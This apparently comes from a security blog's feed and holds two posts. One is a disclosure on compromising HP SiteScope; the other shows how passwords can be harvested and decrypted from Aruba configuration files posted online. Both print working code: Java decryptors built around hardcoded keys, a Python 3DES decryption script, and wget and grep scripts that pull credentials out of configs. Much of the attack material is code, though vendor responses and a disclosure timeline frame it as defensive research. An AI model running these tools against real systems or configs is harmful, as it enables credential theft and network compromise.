BytesdarklyJekyll2018-07-05T08:54:31-05:00https://bytesdarkly.com/Richhttps://bytesdarkly.com/https://bytesdarkly.com/disclosures/2017/06/exploiting-hp-sitescope-from-zero-to-compromise2017-06-13T00:00:00-05:002017-06-13T00:00:00-05:00Richhttps://bytesdarkly.com
<h2 id="introduction">Introduction</h2>
<p>While on an assessment I came across HP SiteScope installed on a server. Having never heard of SiteScope before I started with a Google search. According to Wikipedia,</p>
<blockquote>
<p>HPE SiteScope is agentless monitoring software focused on monitoring the availability and performance of
distributed IT infrastructures, including Servers, Network devices and services, Applications and application components, operating systems and various IT enterprise components</p>
</blockquote>
<p>Availability and performance monitoring servers usually contain sensitive data like credentials which makes them targets of interest.</p>
<p>SiteScope is a web service typically running on port 8080 with a standard web login form. Trying the usual simple credentials (admin:admin, admin:sitescope, etc) didn’t get me anywhere so I began looking for existing exploits. My first stop was a quick Metasploit search which turned up a handful of existing modules including 3 RCE and 1 command injection exploits.</p>
<p><img src="/images/sitescope_metasploit_modules.PNG" alt="sitescope_metasploit_modules.PNG" /></p>
<p>Unfortunately, none of these exploits worked on the SiteScope version (11.31.461) that I found. That left 3 other auxiliary modules, but after looking over the info I didn’t have a lot of hope they would work either. The <a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb">auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess</a> module was based on vulnerabilities reported to <a href="http://www.zerodayinitiative.com/advisories/ZDI-12-176/">ZDI in 2012</a>. From the module info,</p>
<blockquote>
<p>This module exploits an authentication bypass vulnerability in HP SiteScope to
retrieve an arbitrary file from the remote server. It is accomplished by calling
the getFileInternal operation available through the APISiteScopeImpl AXIS service.
This module has been successfully tested on HP SiteScope 11.20 over Windows 2003
SP2 and Linux Centos 6.3</p>
</blockquote>
<p>The target I was assessing was a Windows Server 2008 R2 server and running SiteScope version 11.31.461. I assumed HP had patched this issue in newer versions, but couldn’t find any advisories on it. After reviewing the code it looked like the module was just calling an existing API function. Since there was a low risk of bringing down the server I decided to give it a try. To my surprise it worked! I was able to pull down the <em>C:\windows\win.ini</em> file (default setting in Metasploit).</p>
<p>So now I had blind file access to the system, but it was hit or miss as to which files I could access. Some files I thought I should have access to would fail during download. The files I knew for sure I had access to were all the SiteScope configuration files. After a little research I found that SiteScope credentials are usually stored in the master.config and user.config files. So I downloaded the configuration files only to find that the passwords appeared to be encrypted.</p>
<p><img src="/images/metasploit-redacted.png" alt="metasploit-redacted.png" /></p>
<p><img src="/images/users_config-redacted.png" alt="users_config-redacted.png" /></p>
<p>Back to research. After looking through posts on various support forums I found that the path to the main SiteScope files were located in the < INSTALLFOLDER >\WEB-INF\lib folder. Notice that I mentioned the passwords looked encrypted and not hashed. This is important because encrypted data means there’s a key somewhere. I started methodically pulling down SiteScope files from the target until I came across ss_pu.jar. Then using jd-gui I decompiled the jar and started digging through the code. Pretty soon I came across a PasswordEncrypt function in the com.mercury.sitescope.platform.security.encryption file. PasswordEncrypt calls the “getKey” method in the CryptoSiteScopeKey class. As you can see from the image below it’s a simple getter method that returns the hardcoded 3DES key used to encrypt SiteScope passwords by default.</p>
<p><img src="/images/hardcode_sitescope_3des_key.png" alt="hardcode_sitescope_3des_key.png" /></p>
<p>So what’s interesting about this implementation is that I couldn’t find a “PasswordDecrypt” function. In fact, it looks like SiteScope might actually be just comparing the encrypted values for authentication. This begs the question, “why not just use a hash function?” Anyway, now that I had the encrypted passwords, the method (3DES), and the key all that was left was to implement a decrypt function. There are many ways to do this, but I chose to just use the code that was already in the jar with some slight modifications. I quickly wrote up a PasswordDecrypt function in a new file called PasswordDecrypt.java.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">package</span> <span class="n">com</span><span class="p">.</span><span class="n">mercury</span><span class="p">.</span><span class="n">sitescope</span><span class="p">.</span><span class="n">platform</span><span class="p">.</span><span class="n">security</span><span class="p">.</span><span class="n">encryption</span><span class="p">.</span><span class="n">tool</span><span class="p">;</span>
<span class="n">import</span> <span class="n">com</span><span class="p">.</span><span class="n">mercury</span><span class="p">.</span><span class="n">sitescope</span><span class="p">.</span><span class="n">platform</span><span class="p">.</span><span class="n">security</span><span class="p">.</span><span class="n">encryption</span><span class="p">.</span><span class="n">EncryptionManager</span><span class="p">;</span>
<span class="n">import</span> <span class="n">com</span><span class="p">.</span><span class="n">mercury</span><span class="p">.</span><span class="n">sitescope</span><span class="p">.</span><span class="n">platform</span><span class="p">.</span><span class="n">security</span><span class="p">.</span><span class="n">encryption</span><span class="p">.</span><span class="n">chain</span><span class="p">.</span><span class="n">handler</span><span class="p">.</span><span class="n">CryptoUtils</span><span class="p">;</span>
<span class="n">import</span> <span class="n">com</span><span class="p">.</span><span class="n">mercury</span><span class="p">.</span><span class="n">sitescope</span><span class="p">.</span><span class="n">platform</span><span class="p">.</span><span class="n">security</span><span class="p">.</span><span class="n">encryption</span><span class="p">.</span><span class="n">key</span><span class="p">.</span><span class="n">CryptoToolsKey</span><span class="p">;</span>
<span class="n">import</span> <span class="n">com</span><span class="p">.</span><span class="n">mercury</span><span class="p">.</span><span class="n">sitescope</span><span class="p">.</span><span class="n">platform</span><span class="p">.</span><span class="n">security</span><span class="p">.</span><span class="n">encryption</span><span class="p">.</span><span class="n">key</span><span class="p">.</span><span class="n">CryptoSiteScopeKey</span><span class="p">;</span>
<span class="n">import</span> <span class="n">java</span><span class="p">.</span><span class="n">io</span><span class="p">.</span><span class="n">PrintStream</span><span class="p">;</span>
<span class="k">public</span> <span class="n">class</span> <span class="n">PasswordDecrypt</span>
<span class="p">{</span>
<span class="k">public</span> <span class="n">static</span> <span class="n">void</span> <span class="n">main</span><span class="p">(</span><span class="k">String</span><span class="p">[]</span> <span class="n">args</span><span class="p">)</span>
<span class="p">{</span>
<span class="nf">System</span><span class="p">.</span><span class="n">out</span><span class="p">.</span><span class="n">println</span><span class="p">(</span><span class="s2">"Decrypting password...</span><span class="se">\n</span><span class="s2">"</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">args</span><span class="p">.</span><span class="n">length</span> <span class="c1">!= 1)
</span> <span class="p">{</span>
<span class="nf">System</span><span class="p">.</span><span class="n">out</span><span class="p">.</span><span class="n">println</span><span class="p">(</span><span class="s2">"</span><span class="se">\n\n</span><span class="s2">Wrong parameters. Please enter password to decrypt</span><span class="se">\n</span><span class="s2">"</span><span class="p">);</span>
<span class="nf">System</span><span class="p">.</span><span class="k">exit</span><span class="p">(</span><span class="m">0</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">String</span> <span class="n">decryptPass</span> <span class="p">=</span> <span class="n">args</span><span class="p">[</span><span class="m">0</span><span class="p">];</span>
<span class="n">CryptoSiteScopeKey</span> <span class="n">key</span> <span class="p">=</span> <span class="n">new</span> <span class="n">CryptoSiteScopeKey</span><span class="p">();</span>
<span class="n">CryptoUtils</span><span class="p">.</span><span class="n">setKey</span><span class="p">(</span><span class="n">key</span><span class="p">);</span>
<span class="k">String</span> <span class="n">encryptedPass</span> <span class="p">=</span> <span class="s2">""</span><span class="p">;</span>
<span class="n">try</span><span class="p">{</span>
<span class="n">encryptedPass</span> <span class="p">=</span> <span class="n">EncryptionManager</span><span class="p">.</span><span class="n">getDecrypted</span><span class="p">(</span><span class="n">decryptPass</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">catch</span> <span class="p">(</span><span class="n">Exception</span> <span class="n">e</span><span class="p">)</span>
<span class="p">{</span>
<span class="nf">System</span><span class="p">.</span><span class="n">out</span><span class="p">.</span><span class="n">println</span><span class="p">(</span><span class="n">e</span><span class="p">);</span>
<span class="p">}</span>
<span class="nf">System</span><span class="p">.</span><span class="n">out</span><span class="p">.</span><span class="n">println</span><span class="p">(</span><span class="s2">"</span><span class="se">\n\n</span><span class="s2">Decrypted Password = "</span> <span class="p">+</span> <span class="n">encryptedPass</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>jar files are really just zip archives so all you have to do to patch a jar is compile the code into a .class file and zip it back up into a jar. Now that I had my new patched version of ss_pu.jar I could call the PasswordDecrypt function with the encrypted administrator password for the win.</p>
<p><img src="/images/pw_decrypt-redacted.png" alt="pw_decrypt-redacted.png" /></p>
<p>At this point I was able to login to SiteScope with administrator access. After exploring the SiteScope menu for a few minutes I was drawn to the “Credential Preferences” option.</p>
<p><img src="/images/cred_prefs-redacted.png" alt="cred_prefs-redacted.png" /></p>
<p>It turns out that in order for SiteScope to monitor other servers it needs to be configured with valid credentials to those systems. Remember that SiteScope is advertised as an agentless solution. The system I was on appeared to have credentials for both Windows and Linux servers stored in its profiles. Opening one of the profiles showed the username and a masked password, but even administrators are not able to unmask the passwords through the web interface.</p>
<p><img src="/images/credential_profile_detail.png" alt="credential_profile_detail.png" /></p>
<p>I could configure new profiles for SiteScope to use, but not view existing credentials. I clicked a few of the profiles and noticed that the length of the masked passwords changed which means that, at least, some information about the password was being returned by the server. Was it just the password length or was SiteScope sending more?</p>
<p>I opened up Wireshark to explore the traffic in more detail and was immediately presented with the clear text passwords stored in the credential profiles! That’s not good.</p>
<p><img src="/images/wireshark-redacted.png" alt="wireshark-redacted.png" /></p>
<p>In this case the target I was working on was an internal facing server, and also wasn’t configured with SSL. Anyone listening on the wire internally could intercept credentials being passed in the clear. So at the very least this was a configuration issue for the administrator, but this is also a major flaw in SiteScope. Even if SSL is configured malicious users could still <a href="https://jimshaver.net/2015/02/11/decrypting-tls-browser-traffic-with-wireshark-the-easy-way/">MitM their own session</a> to obtain clear text credentials for any profile stored in SiteScope. Depending on the level of access these accounts have, this could mean complete domain and/or root compromise.</p>
<h2 id="other-findings">Other findings</h2>
<p>While digging around the SiteScope code I also came across a class called “OldEncryptionHandler” which appears to be a proprietary encryption scheme with a hardcoded private key of “SiteScopeFreshWaterSoftware”.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> public class OldDecrypt {
public static void main(String args[]){
//String subEncryptedString = "MGNCOIMKMGMGNOOAMK";
String subEncryptedString = "MDMKOHNIMDMLOBNBNIKL";
StringBuilder result = new StringBuilder();
int il = subEncryptedString.length() / 2;
int pp = 0;
for (int i = 0; i < il; i++)
{
int h = subEncryptedString.charAt(pp++) - 'A';
int l = subEncryptedString.charAt(pp++) - 'A';
int c = h * 16 + l;
c -= "SiteScopeFreshwaterSoftware".charAt(i % "SiteScopeFreshwaterSoftware".length());
result.append((char)c);
}
System.out.println(result);
}
}
</code></pre></div></div>
<p>Some items in the configuration files appear to still use this function for encryption. For example, the _httpSecureKeyPassword and _httpSecureKeystorePassword configuration items located in master.config are encrypted with the OldEncryptionHandler.</p>
<h2 id="mitigations">Mitigations</h2>
<p>The following mitigations are taken directly from HPEs response to my report.</p>
<p>With regards to SiteScope version 11.31.461 (and prior) still being susceptible to exploits in Metasploit.</p>
<blockquote>
<p>A fix for this is available in SiteScope release 11.24 IP7 onwards, via a flag called “_disableOldAPIs=true” that can be set in the “groups/master.config” file. Setting of this flag will prevent this and other such unauthenticated services from being executed.</p>
</blockquote>
<p>A quick Shodan search shows, at least, 230 public facing SiteScope servers across the world. I wonder how many admins know about this setting, and why wouldn’t HPE just remove the old APIs from new versions if they are no longer needed?</p>
<p>With regards to any hardcoded encryption keys.</p>
<blockquote>
<p>These hardcoded keys are used for backward compatibility and obfuscation. For encryption, Key Management can be enabled which will mitigate this vulnerability. For enabling Key Management please refer SiteScope Deployment Guide - Chapter 20: Configuring SiteScope to Use a Custom Key for Data Encryption.</p>
</blockquote>
<p>With regards to custom cryptographic functions like OldEncryptionHandler</p>
<blockquote>
<p>ss_pu.jar contains only obfuscation keys and those keys are not used for encryption. Customizable cryptographic keys are generated during key management. Encryption is done by key management in SiteScope. Please refer SiteScope Deployment Guide - Chapter 20: Configuring SiteScope to Use a Custom Key for Data Encryption.</p>
</blockquote>
<p>With regards to SiteScope insecure transmission of credentials:</p>
<blockquote>
<p>The fix is planned to upcoming release approximately Q3 2017.</p>
</blockquote>
<h2 id="disclosure-timeline">Disclosure Timeline</h2>
<ul>
<li>4 April 2017: Inital report - PSRT case opened</li>
<li>22 May 2017: Requested coordination assistance from US-CERT</li>
</ul>
<p>From initial report to 6 June 2017 I made repeated requests for mitigation guidance. The only response I received is:</p>
<blockquote>
<p>We are working on all the findings/items in the report with the product team.</p>
</blockquote>
<ul>
<li>6 June 2017: Response received from PSRT with mitigations for 3/4 items, and a request to delay disclosure until Q3 2017</li>
</ul>
<p>After discussing with US-CERT we decided to disclose in accordance with the US-CERT 45 day disclosure timeline in an effort to encourage HPE to provide defender mitigations as soon as possible. Vulnerability Note from US-CERT: <a href="https://www.kb.cert.org/vuls/id/768399">https://www.kb.cert.org/vuls/id/768399</a></p>
<p><a href="https://bytesdarkly.com/disclosures/2017/06/exploiting-hp-sitescope-from-zero-to-compromise.html">Exploiting HP SiteScope From Zero to Compromise!</a> was originally published by Rich at <a href="https://bytesdarkly.com">Bytesdarkly</a> on June 13, 2017.</p>https://bytesdarkly.com/2016/08/harvesting-passwords-from-aruba-configs2016-08-18T05:09:01-05:002016-08-18T05:09:01-05:00Richhttps://bytesdarkly.com
<p><em><strong>UPDATE:</strong> I actually received a very nice email from an Aruba Security Architect regarding this post. They are actively engaged in making their products more secure and addressing these issues. Could not ask for a better response from a vendor. Kudos.</em></p>
<h2 id="intro">Intro</h2>
<p>On a recent wireless assessment we ran across Aruba infrastructure. Since Sven Blumenstein, from Google Security Team, recently published <a href="http://seclists.org/fulldisclosure/2016/May/19">26 vulnerabilities</a> for Aruba OS, Airwave Management Platform, and Aruba Instant I was eager to start the vulnerability analysis phase to see if our targets were still vulnerable to his findings. The entire write-up is really nicely done, and shows a full range of vulnerabilities in Aruba products, but I want to focus on #26 because I believe the impact is far worse than it appears. Finding #26 references CVE-2014-7299 which describes storage of Aruba password hashes as “encrypted password hashes”. You can read the details on the original disclosure, but in short passwords displayed in the Aruba config files are not hashed- they are encrypted with 3DES in CBC mode. If you were to enter the <em>show running-config</em> command you might see something like this:</p>
<p style="text-align: center;">
<em>mgmt-user admin f9ac59cd431e174fb07539a8a811a1aa</em>
</p>
<p>This is all well and good unless, of course, a malicious actor had the decryption key. Quoting straight from the disclosure:</p>
<blockquote>
<p>The encryption algorithm uses a 24 byte static key which is hardcoded on the AP. Sampling of different Firmware versions confirmed that the key is identical for all available versions. The IV required for 3DES consists of 8 random bytes, and is stored as the first 8 byte of the encrypted password.</p>
</blockquote>
<p>Going one step further a Proof-of-Concept (PoC) decryption script is included in the write-up to make it easy to recover encrypted passwords.</p>
<pre style="font-family: arial; font-size: 12px; border: 1px dashed #CCCCCC; width: 99%; height: auto; overflow: auto; background: #f0f0f0; padding: 0px; color: #000000; text-align: left; line-height: 20px;"><code style="color: #000000; word-wrap: normal;"> import pyDes
hashes = (
'f9ac59cd431e174fb07539a8a811a1aa', # admin
'd7a75c655b8e2fb8609d0b04275e02767f2dfae8c63088cf' # adminadmin
)
key = (
'\x32\x74\x10\x84\x91\x17\x75\x46\x14\x75\x82\x92'
'\x43\x49\x04\x59\x18\x69\x15\x94\x27\x84\x30\x03'
)
for h in hashes:
d = pyDes.triple_des(key, pyDes.CBC, h.decode('hex')[:8], pad='\00')
print h, '=>', d.decrypt(h.decode('hex')[8:])
</code></pre>
<p> <figure id="attachment_468" style="width: 548px" class="wp-caption aligncenter"></figure></p>
<p><a href="/images/2016/08/aruba_decrypt_example.png"><img class="size-full wp-image-468" src="/images/2016/08/aruba_decrypt_example.png" alt="Decrypting POC" width="548" height="180" srcset="/images/2016/08/aruba_decrypt_example.png 548w, /images/2016/08/aruba_decrypt_example-300x99.png 300w" sizes="(max-width: 548px) 100vw, 548px" /></a></p>
<p>Ok, so encrypting passwords (vs. hashing) is, unfortunately, a fairly common practice. The <a href="https://nakedsecurity.sophos.com/2013/11/04/anatomy-of-a-password-disaster-adobes-giant-sized-cryptographic-blunder/">Adobe breach in 2013</a> revealed similar findings, but in that case the decryption key was never revealed publicly. In response to this disclosure Aruba issued an <a href="http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-004.txt">advisory</a> that, well, sort of acknowledged the issue, but down played the impact. Below are a few partial quotes from the advisory:</p>
<blockquote>
<p>…All passwords in an IAP configuration file are stored using reversible encryption…<strong>The configuration file should never be exposed to an attacker</strong>…Aruba does not consider this a vulnerability, but the behavior does not follow industry best practices for security and defense-in-depth…</p>
</blockquote>
<p>This is an interesting response when you consider the following Google search<figure id="attachment_470" style="width: 864px" class="wp-caption aligncenter"></figure></p>
<p><a href="/images/2016/08/aruba_google_search1.png"><img class="size-full wp-image-470" src="/images/2016/08/aruba_google_search1.png" alt="Google Dork for Aruba Configs" width="864" height="457" srcset="/images/2016/08/aruba_google_search1.png 864w, /images/2016/08/aruba_google_search1-300x159.png 300w, /images/2016/08/aruba_google_search1-768x406.png 768w" sizes="(max-width: 864px) 100vw, 864px" /></a></p>
<p>Clicking on one of these links from the Aruba Support forum takes me to a config file that someone has uploaded, I’m presuming, in conjunction with a support question. Going one step further, if I narrow the scope down to just <em>arubanetworks.com</em> we get 107 results alone! At least one of these configs has been posted in the last month (Jul 27, 2016) so I’m assuming this issue hasn’t been brought up with Aruba customers.<figure id="attachment_474" style="width: 523px" class="wp-caption aligncenter"></figure></p>
<p><a href="/images/2016/08/config_wpa_passphrase.png"><img class="wp-image-474 size-full" src="/images/2016/08/config_wpa_passphrase.png" alt="config_wpa_passphrase" width="523" height="350" srcset="/images/2016/08/config_wpa_passphrase.png 523w, /images/2016/08/config_wpa_passphrase-300x201.png 300w" sizes="(max-width: 523px) 100vw, 523px" /></a></p>
<p> <figure id="attachment_471" style="width: 770px" class="wp-caption aligncenter"></figure></p>
<p><a href="/images/2016/08/aruba_google_search2.png"><img class="size-full wp-image-471" src="/images/2016/08/aruba_google_search2.png" alt="More configs" width="770" height="254" srcset="/images/2016/08/aruba_google_search2.png 770w, /images/2016/08/aruba_google_search2-300x99.png 300w, /images/2016/08/aruba_google_search2-768x253.png 768w" sizes="(max-width: 770px) 100vw, 770px" /></a></p>
<p> </p>
<p>So lets review what we know so far- <em>configuration files posted publicly on the Internet, and contain credentials, can now be easily decrypted</em>. Just great.</p>
<p>Further, it’s not just the <em>mgmt-user</em> setting that can be decrypted either. With just a cursory look I identified a number of stored passwords that can be extracted from Aruba config files.</p>
<pre style="font-family: arial; font-size: 12px; border: 1px dashed #CCCCCC; width: 99%; height: auto; overflow: auto; background: #f0f0f0; padding: 0px; color: #000000; text-align: left; line-height: 20px;"><code style="color: #000000; word-wrap: normal;"> wpa-passphrase <hash>
key <hash>
mgmt-user <uname> <level> <hash>
ip pppoe-password <hash>
ike authentication PRE-SHARE <hash>
arm-rf-domain-key "<hash>"
user <uname> <hash> <junk>
Airwave Shared Key:<hash>
Master Key:<hash>
localip <ip> ipsec <hash>
ams-key <hash>
ams-identity <hash>
snmp-server community <hash>
opendns <domain> <hash>
</code></pre>
<p> </p>
<h2 id="the-harvest">The Harvest</h2>
<p>With just a little bit of scripting one can easily start harvesting these credentials. First you’ll need to gather all the links to the config files posted online. I’m going to leave this step as an exercise for the reader. I used PowerShell, but feel free to use you’re favorite technique. (As a side note, Google is a fun sparing partner when it comes to parsing search results.)</p>
<p>The next step is to download all the configs. A simple Bash 1-liner will take care of that part.</p>
<pre style="font-family: arial; font-size: 12px; border: 1px dashed #CCCCCC; width: 99%; height: auto; overflow: auto; background: #f0f0f0; padding: 0px; color: #000000; text-align: left; line-height: 20px;"><code style="color: #000000; word-wrap: normal;"> for i in $(cat aruba_links.txt); do wget $i --timeout 10 --tries 2; done
</code></pre>
<p> <figure id="attachment_467" style="width: 721px" class="wp-caption aligncenter"></figure></p>
<p><a href="/images/2016/08/aruba_config_download.png"><img class="size-full wp-image-467" src="/images/2016/08/aruba_config_download.png" alt="Quick one liner to download all the configs" width="721" height="323" srcset="/images/2016/08/aruba_config_download.png 721w, /images/2016/08/aruba_config_download-300x134.png 300w" sizes="(max-width: 721px) 100vw, 721px" /></a></p>
<p> </p>
<p>Next we need to extract the hashes. There are many ways to do this, but I chose to use grep as a simple parser. The downside is that it’s not a very clean technique, and I ended up with a lot of junk in the results file. Rather than spend too much time on this I just clean-up the results manually by removing non-hashes by hand. If I were to build a general purpose tool I’d get more fancy with this step by maybe using <a href="https://pypi.python.org/pypi/ciscoconfparse">ciscocongparse</a> to get more accurate results.</p>
<pre style="font-family: arial; font-size: 12px; border: 1px dashed #CCCCCC; width: 99%; height: auto; overflow: auto; background: #f0f0f0; padding: 0px; color: #000000; text-align: left; line-height: 20px;"><code style="color: #000000; word-wrap: normal;"> #!/bin/bash
outfile="config_hashes.txt"
config_file=configs/*.txt
grep -o 'wpa-passphrase.*' $config_file | cut -d " " -f 2 >> $outfile
grep -o 'key .*' $config_file | cut -d " " -f 2 >> $outfile
grep -o 'mgmt-user.*' $config_file | cut -d " " -f 3 >> $outfile
grep -o 'mgmt-user.*' $config_file | cut -d " " -f 4 >> $outfile
grep -o 'ip pppoe-password.*' $config_file | cut -d " " -f 3 >> $outfile
grep -o 'ike authentication PRE-SHARE. *' $config_file | cut -d " " -f 4 >> $outfile
grep -o 'ike authentication PRE-SHARE .*' $config_file | cut -d " " -f 5 >> $outfile
grep -o 'arm-rf-domain-key.*' $config_file | cut -d " " -f 2 | tr -d '"' >> $outfile
grep -o 'user.*' $config_file | cut -d " " -f 3 >> $outfile
grep -o 'user.*' $config_file | cut -d " " -f 4 >> $outfile
grep -o 'Airwave Shared.*' $config_file | cut -d ":" -f 3 >> $outfile
grep -o 'Master Key.*' $config_file | cut -d ":" -f 3 >> $outfile
grep -o 'localip.*' $config_file | cut -d " " -f 4 >> $outfile
grep -o 'ams-key.*' $config_file | cut -d " " -f 2 >> $outfile
grep -o 'ams-key.*' $config_file | cut -d " " -f 4 >> $outfile
grep -o 'ams-identity.*' $config_file | cut -d " " -f 2 >> $outfile
grep -o 'ams-identity.*' $config_file | cut -d " " -f 4 >> $outfile
grep -o 'snmp-server community.*' $config_file | cut -d " " -f 3 >> $outfile
grep -o 'snmp-server community.*' $config_file | cut -d " " -f 5 >> $outfile
grep -o 'opendns.*' $config_file | cut -d " " -f 3 >> $outfile
grep -o 'enable secret.*' $config_file | cut -d " " -f 3 >> $outfile
grep -o 'enable secret.*' $config_file | cut -d " " -f 4 >> $outfile
grep -o 'enable secret.*' $config_file | cut -d " " -f 5 >> $outfile
grep -o 'wepkey1.*' $config_file | cut -d " " -f 2 >> $outfile
</code></pre>
<p> </p>
<h2 id="decrypting">Decrypting</h2>
<p>Now that we have a file full of hashes we can use the PoC Python code to recover some of the passwords. In this case I was able decrypt 99 passwords and another 62 hashes were filtered out. The filtered hashes are MD5 or other formats not recoverable with the Python script used here.<figure id="attachment_465" style="width: 736px" class="wp-caption aligncenter"></figure></p>
<p><a href="/images/2016/08/aruab_decrypt_file.png"><img class="size-full wp-image-465" src="/images/2016/08/aruab_decrypt_file.png" alt="Decrypting " width="736" height="172" srcset="/images/2016/08/aruab_decrypt_file.png 736w, /images/2016/08/aruab_decrypt_file-300x70.png 300w" sizes="(max-width: 736px) 100vw, 736px" /></a></p>
<p> <figure id="attachment_469" style="width: 723px" class="wp-caption aligncenter"></figure></p>
<p><a href="/images/2016/08/aruba_decrypt_result.png"><img class="size-full wp-image-469" src="/images/2016/08/aruba_decrypt_result.png" alt="Verbose decrypt" width="723" height="289" srcset="/images/2016/08/aruba_decrypt_result.png 723w, /images/2016/08/aruba_decrypt_result-300x120.png 300w" sizes="(max-width: 723px) 100vw, 723px" /></a></p>
<p> </p>
<p>Just from the results above we can see the usual offenders like <em>1234qwer, aruba123,</em> and other easily recoverable passwords. After removing the duplicates and running <a href="https://github.com/iphelix/pack">statsgen</a> we ended up 86 passwords, and all in less time it took to drink a cup of coffee.</p>
<p> <figure id="attachment_466" style="width: 685px" class="wp-caption aligncenter"></figure></p>
<p><a href="/images/2016/08/aruab_statsgen.png"><img class="size-full wp-image-466" src="/images/2016/08/aruab_statsgen.png" alt="PACK statsgen.py" width="685" height="437" srcset="/images/2016/08/aruab_statsgen.png 685w, /images/2016/08/aruab_statsgen-300x191.png 300w" sizes="(max-width: 685px) 100vw, 685px" /></a></p>
<p> </p>
<p>For those that are interested below is the full output from statsgen.</p>
<p> </p>
<pre style="font-family: arial; font-size: 12px; border: 1px dashed #CCCCCC; width: 99%; height: auto; overflow: auto; background: #f0f0f0; padding: 0px; color: #000000; text-align: left; line-height: 20px;"><code style="color: #000000; word-wrap: normal;"> statsGen 0.0.3 | |
_ __ __ _ ___| | _
| '_ \ / _` |/ __| |/ /
| |_) | (_| | (__| <
| .__/ \__,_|\___|_|\_\
| |
|_| iphelix@thesprawl.org
[*] Analyzing passwords in [../recovered.txt]
[+] Analyzing 100% (86/86) of passwords
NOTE: Statistics below is relative to the number of analyzed passwords, not total number of passwords
[*] Length:
[+] 8: 27% (24)
[+] 10: 19% (17)
[+] 9: 12% (11)
[+] 5: 10% (9)
[+] 11: 09% (8)
[+] 6: 05% (5)
[+] 13: 04% (4)
[+] 12: 03% (3)
[+] 26: 02% (2)
[+] 7: 01% (1)
[+] 17: 01% (1)
[+] 19: 01% (1)
[*] Character-set:
[+] loweralphanum: 32% (28)
[+] loweralpha: 26% (23)
[+] all: 24% (21)
[+] numeric: 03% (3)
[+] mixedalphanum: 03% (3)
[+] loweralphaspecialnum: 03% (3)
[+] upperalphanum: 02% (2)
[+] loweralphaspecial: 02% (2)
[+] mixedalphaspecial: 01% (1)
[*] Password complexity:
[+] digit: min(0) max(14)
[+] lower: min(0) max(12)
[+] upper: min(0) max(5)
[+] special: min(0) max(4)
[*] Simple Masks:
[+] othermask: 31% (27)
[+] string: 26% (23)
[+] stringdigit: 19% (17)
[+] digitstring: 05% (5)
[+] stringspecialdigit: 04% (4)
[+] stringdigitspecial: 04% (4)
[+] stringdigitstring: 03% (3)
[+] digit: 03% (3)
[*] Advanced Masks:
[+] ?l?l?l?l?l: 10% (9)
[+] ?l?l?l?l?l?l?l?l: 09% (8)
[+] ?l?l?l?l?l?l?l?d: 05% (5)
[+] ?l?u?s?l?d?l?d?l?s?s: 04% (4)
[+] ?l?l?l?l?l?d?d?d?d: 04% (4)
[+] ?u?l?l?l?l?d?d?d?s: 04% (4)
[+] ?d?d?d?d?l?l?l?l: 03% (3)
[+] ?l?l?l?l?l?l: 03% (3)
[+] ?l?d?l?d?l?d?d?d?d?d?d: 03% (3)
[+] ?l?l?l?l?l?l?d?d?d: 03% (3)
[+] ?u?l?d?l?u?l?d?u?u?d: 03% (3)
[+] ?l?l?l?l?d?l?l?l?l?l: 02% (2)
[+] ?u?s?l?l?l?d?l?l: 02% (2)
[+] ?l?l?l?l?l?s?l?l?l?l?s?l?l: 02% (2)
[+] ?l?l?l?l?l?l?d?d?d?d?d?d?d?l?l?l?l?l?l?d?d?d?d?d?d?d: 02% (2)
[+] ?u?l?u?l?s?s?s?s?l?l?d?d: 02% (2)
[+] ?d?d?d?d?d?d?d?d: 02% (2)
[+] ?l?l?l?l?l?l?l?l?l?l: 02% (2)
[+] ?d?d?d?l?l?l?l?l?l?l: 02% (2)
[+] ?u?l?s?u?l?u?s?d?d?l?l?l?d: 02% (2)
[+] ?u?d?l?l?u?s?l?l?l?l?l: 02% (2)
[+] ?l?l?l?s?d?d?d?d: 02% (2)
[+] ?u?d?d?d?d?d: 02% (2)
[+] ?l?l?l?l?l?l?l?d?d?d: 02% (2)
[+] ?u?d?l?u?l?d?s?l?s?l?l: 02% (2)
[+] ?u?s?l?l?d?l?l?u?s?l?l?l?l?l?l?d?d?d?d: 01% (1)
[+] ?d?d?d?d?d?d?d?d?d?d: 01% (1)
[+] ?l?l?l?l?d?l?l?l?l?l?l: 01% (1)
[+] ?u?l?l?l?l?l?s?d: 01% (1)
[+] ?u?d?l?d?u?l?s?u?l?s: 01% (1)
[+] ?l?l?l?l?l?l?l: 01% (1)
[+] ?l?l?u?s?l?u?l?l?u?s?u?l?l?l?s?l?u: 01% (1)
[+] ?l?l?l?l?l?d?d?d: 01% (1)
[+] ?l?l?l?l?l?l?l?l?l?s?d?d: 01% (1)
</code></pre>
<p> </p>
<h2 id="conclusion">Conclusion</h2>
<p>Posting configs online is not anything new, but overall this is very frustrating for me as a security professional. I spend a lot of time making recommendations for securing systems, but no amount of configuring or fancy equipment can protect you if you’re posting your passwords online. I’m sure some of you are saying, “but they were encrypted..how was I suppose to know?”. Which brings me to my main point – assume breach, assume compromise, assume your awesome passwords will be cracked. And stop making it easy by posting your configs on a publicly accessible site! When used correctly encryption is the foundation of a secure Internet, but it’s not cyber pixie dust that magically protects you from everything bad online. If you’ve ever posted a config online go and change those passwords now; otherwise you are at risk.</p>
<p><a href="https://bytesdarkly.com/2016/08/harvesting-passwords-from-aruba-configs/">Harvesting Passwords from Aruba Configs</a> was originally published by Rich at <a href="https://bytesdarkly.com">Bytesdarkly</a> on August 18, 2016.</p>https://bytesdarkly.com/2016/02/twitter-features-i-actually-want2016-02-15T09:39:47-05:002016-02-15T09:39:47-05:00Richhttps://bytesdarkly.com
<p>This is a somewhat off topic post about Twitter. Twitter is where the InfoSec community currently “lives”. If you’re trying to get into this field then one of the first easy things you can do is get a Twitter account and start following the researchers that interest you. However, there are some things about the native Twitter experience that bother me. This post is inspired by the <a href="https://www.washingtonpost.com/news/the-switch/wp/2016/02/12/how-twitter-just-caused-a-lot-of-confusion-for-londons-subways/">new timeline</a> features Twitter wants to implement where the timeline can be organized by relevancy rather than when it was posted. Ignoring the fact that a timeline is not a timeline when it’s out of order this change destroys the ability to follow topics in real-time – one of Twitter’s most powerful features in my opinion.</p>
